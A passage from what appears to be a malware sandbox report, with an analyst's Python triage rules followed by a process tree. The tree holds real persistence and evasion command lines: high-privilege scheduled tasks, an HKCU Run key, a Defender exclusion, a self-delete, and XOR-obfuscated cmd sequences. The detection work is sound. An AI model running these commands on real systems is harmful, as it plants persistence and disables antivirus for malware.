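Analyst note on the persistence and defence-evasion children in this tree (added triage example, not sandbox output): the schtasks.exe children register the dropped executables with `/rl HIGHEST`, either as a one-shot task that repeats every 60 minutes for 9999 hours (`/sc once /ri 60 /du 9999:59`), at logon (`/sc ONLOGON`), or from an XML definition written to `%TEMP%` (`/Create /TN "Updates\..." /XML`); the powershell.exe children write an HKCU `Run` value pointing into `AppData` and add a Defender exclusion for the dropped file (`Add-MpPreference -ExclusionPath`); InstallUtil.exe and RegAsm.exe are started with no arguments as hollowing hosts (the parent is tagged "Suspicious use of SetThreadContext"), and one cmd.exe child tries to delete the InstallUtil.exe binary after a 6-second `timeout`. One detail in the Run-key lines: `Remove -ItemProperty` with a space is not `Remove-ItemProperty`, so PowerShell reports an unknown command `Remove`, continues to the next statement, and the `New-ItemProperty` still writes the value, which is why the sandbox tags those lines as adding a Run key. The rule set below is mine and keyed to the exact command lines in this report; the sample lines are copied from the tree, and the rule labels and helper names are assumptions.

```python
"""Triage the persistence and evasion commands in the process tree above.

The rules are written against the exact command lines the report shows:
scheduled tasks, an HKCU Run value, a Defender exclusion, a delayed
self-delete and .NET utilities started as injection hosts.  Added analyst
example, not part of the sandbox output.
"""
import re

# Lines copied verbatim from the tree above, one per technique, plus the
# harmless `timeout /t 6` child as a control that must not match.  The report
# runs image path, command line and tree depth together; the rules tolerate
# that and match on the command-line part.
SAMPLE_LINES = r'''
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f12⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsFilerar';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsFilerar' -Value '"C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe"' -PropertyType 'String'11⤵
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "svhosts" /sc ONLOGON /tr "C:\Users\Admin\Downloads\614.exe" /rl HIGHEST /f3⤵
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ePnxkugSsfE" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1CD8.tmp"3⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ePnxkugSsfE.exe"3⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & exit4⤵
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"11⤵
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
'''.strip().splitlines()

# (label, pattern) pairs; labels are mine.
RULES = [
    ("schtasks: task created with /rl HIGHEST",
     re.compile(r"schtasks.*?/create.*?/rl\s+highest", re.I)),
    ("schtasks: one-shot task repeating every /ri minutes (keepalive)",
     re.compile(r"schtasks.*?/sc\s+once\b.*?/ri\s+\d+", re.I)),
    ("schtasks: logon trigger",
     re.compile(r"schtasks.*?/sc\s+onlogon\b", re.I)),
    ("schtasks: task imported from an XML file in a Temp directory",
     re.compile(r'schtasks.*?/create.*?/xml\s+"[^"]*\\temp\\', re.I)),
    ("registry: HKCU Run value pointing into AppData",
     re.compile(r"new-itemproperty.*?currentversion\\run.*?-value\s+'\"?[^']*\\appdata\\", re.I)),
    ("defender: exclusion path added with Add-MpPreference",
     re.compile(r"add-mppreference\s+-exclusionpath", re.I)),
    ("anti-forensics: delayed self-delete (timeout & del)",
     re.compile(r"timeout\s+/t\s+\d+\s*&\s*del\s+/f", re.I)),
    (".NET utility (RegAsm/InstallUtil) started without arguments: injection host",
     re.compile(r'\\(?:regasm|installutil)\.exe(?:"[^"]*"|#cmd)\d{1,2}⤵?$', re.I)),
]

# Where the persisted or excluded executable path sits in each command.
_PATH_ARGS = [
    re.compile(r'/tr\s+"([^"]+)"', re.I),                 # schtasks /tr
    re.compile(r"-value\s+'\"?([^'\"]+)\"?'", re.I),      # New-ItemProperty -Value
    re.compile(r'-exclusionpath\s+"([^"]+)"', re.I),      # Add-MpPreference
]


def scan(lines) -> list:
    """Return (line_number, rule_label) for every rule that fires, 1-based."""
    hits = []
    for n, line in enumerate(lines, 1):
        for label, rx in RULES:
            if rx.search(line):
                hits.append((n, label))
    return hits


def persisted_paths(lines) -> list:
    """Executables the tree registers for persistence or excludes from Defender."""
    found = set()
    for line in lines:
        for rx in _PATH_ARGS:
            found.update(rx.findall(line))
    return sorted(found)


if __name__ == "__main__":
    for n, label in scan(SAMPLE_LINES):
        print(f"line {n}: {label}")
    print("persisted:", *persisted_paths(SAMPLE_LINES), sep="\n  ")
```

Run over the whole tree, `persisted_paths` gives the list of files to pull from the sandbox and to hunt for on the host (the `SecurityHealthService`, `WindowsFilerar` and `SystemGuardRuntime` folders under `%AppData%`, `subdir\svchosts.exe`, and the `/XML`-imported `Updates\ePnxkugSsfE` task). The depth digits fused onto each line are an extraction artefact; the rules deliberately do not depend on them.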
C:\Users\Admin\Downloads\Miljoeministeren.exe"C:\Users\Admin\Downloads\Miljoeministeren.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x40^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x62^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x77^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x45^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x42^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6E^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x37^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x3B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x73^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x37^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x3B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x36^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x35^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x55^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x77^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x76^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x62^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x42^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6C^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x60^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x32^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x37^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x73^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x32^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x35^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x50^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x77^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x45^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x53^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6C^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x77^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x36^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x3B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x3A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x35^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x62^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x67^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x45^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x36^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x32^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x32^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x29^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x35^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x76^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6E^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x70^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6C^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x76^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x60^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x57^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x7A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x73^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x70^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x42^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x32^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x23^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x33^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2A^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x35^3"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
